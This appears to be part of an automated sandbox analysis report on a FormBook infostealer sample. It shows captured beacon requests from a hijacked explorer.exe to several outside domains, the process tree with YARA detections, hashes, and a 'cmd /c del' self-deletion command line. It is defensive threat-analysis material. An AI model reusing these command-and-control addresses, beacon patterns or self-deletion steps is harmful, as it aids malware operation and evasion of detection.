                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.449766202.66.173.11680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:08.227961063 CET5581OUTGET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.karthikeyainfraindia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:08.410000086 CET5583INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Server: Microsoft-IIS/8.0
                                                                        X-Powered-By: ASP.NET
                                                                        X-Powered-By-Plesk: PleskWin
                                                                        Date: Tue, 23 Feb 2021 09:08:03 GMT
                                                                        Connection: close
                                                                        Content-Length: 1245
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have bee


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.449769160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:18.614079952 CET5603OUTGET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.buysellleasewithlisa.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:18.663569927 CET5603INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.44977094.23.162.16380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 10:08:23.806049109 CET5604OUTGET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.besteprobioticakopen.online
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:23.850476980 CET5604INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                        Date: Tue, 23 Feb 2021 09:08:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 194
                                                                        Connection: close
                                                                        Location: http://www.besteprobioticakopen.online/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Start time:10:06:23
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
                                                                        Imagebase:0x6e0000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:06:41
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:{path}
                                                                        Imagebase:0x310000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:06:42
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:{path}
                                                                        Imagebase:0xaa0000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:06:44
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff6fee60000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:10:07:00
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                        Imagebase:0xc70000
                                                                        File size:831488 bytes
                                                                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:10:07:01
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                        Imagebase:0x13e0000
                                                                        File size:3611360 bytes
                                                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:high

                                                                        General

                                                                        Start time:10:07:04
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
                                                                        Imagebase:0x11d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:10:07:05
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >